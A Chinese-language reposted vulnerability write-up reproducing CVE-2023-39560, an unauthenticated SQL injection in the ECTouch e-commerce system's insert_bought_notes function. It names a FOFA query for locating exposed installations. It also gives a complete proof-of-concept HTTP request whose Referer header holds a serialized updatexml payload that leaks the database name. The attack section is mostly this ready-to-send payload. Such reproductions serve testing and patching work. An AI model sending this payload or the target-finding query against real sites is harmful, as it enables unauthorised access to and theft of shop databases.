当前位置: 首页 > news >正文

ECTouch 电商微信小程序 SQL注入漏洞复现(CVE-2023-39560)

news 2025/8/4 19:15:37

0x01 产品简介

ECTouch是一款开源的电商系统,为中小企业提供最佳的新零售解决方案

0x02 漏洞概述

ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中,传入的 $arr['id'] 参数未进行验证和过滤,导致未经身份验证的攻击者利用该漏洞进行SQL 注入,获取数据库敏感信息。

0x03 复现环境

FOFA:"themes/default/statics/css/ectouch.css"

0x04 漏洞复现

PoC

GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}

查询当前数据库

http://www.lryc.cn/news/284190.html

相关文章:

  • MCM备赛笔记——熵权法
  • vscode设置terminal的最大行数
  • kafka hang 问题记录
  • Jmeter-BeanShell脚本中for循环里面使用random随机数函数,每次生成的都一样
  • 高级编程。JavaScript中有哪些类型转换机制?
  • Linux系统下常用软件安装汇总,包括mysql,java,git,redis等
  • 【Linux】——期末复习题(一)
  • 【论文阅读】Speech Driven Video Editing via an Audio-Conditioned Diffusion Model
  • 【华为 ICT HCIA eNSP 习题汇总】——题目集4
  • hadoop-common: CMake failed with error code 1
  • 【面试】-科大讯飞日常实习面试
  • MySQL 数据加密
  • 风丘科技为您提供完整的ADAS测试方案
  • 深入理解Rust基本类型
  • cloudflare加速方法
  • 密码学学习笔记(二十四):TCP/IP协议栈
  • 软件测试阶段简介_单元测试、集成测试、配置项测试、系统测试
  • AcWing 1204.错误票据(读取未知个数数据的新方法)
  • 项目上线存在的缓存问题以及存在的debugger和console.log等问题
  • 均线和布林线这样的关系,WeTrade众汇实例这样使用
  • C++中的区块链与加密货币开发
  • 【云略】2023年新茶饮行业社媒营销洞察报告
  • 19. C++ static关键字
  • thinkphp6 模糊查找json下的字段值
  • 链表存数相加算法(leetcode第2题)
  • 旅游项目day07
  • java黑马学习笔记
  • WordPress后台底部版权信息“感谢使用 WordPress 进行创作”和版本号怎么修改或删除?
  • 解决字符串类型转数字类型相加结果异常问题
  • android 开发 W/TextToSpeech: speak failed: not bound to TTS engine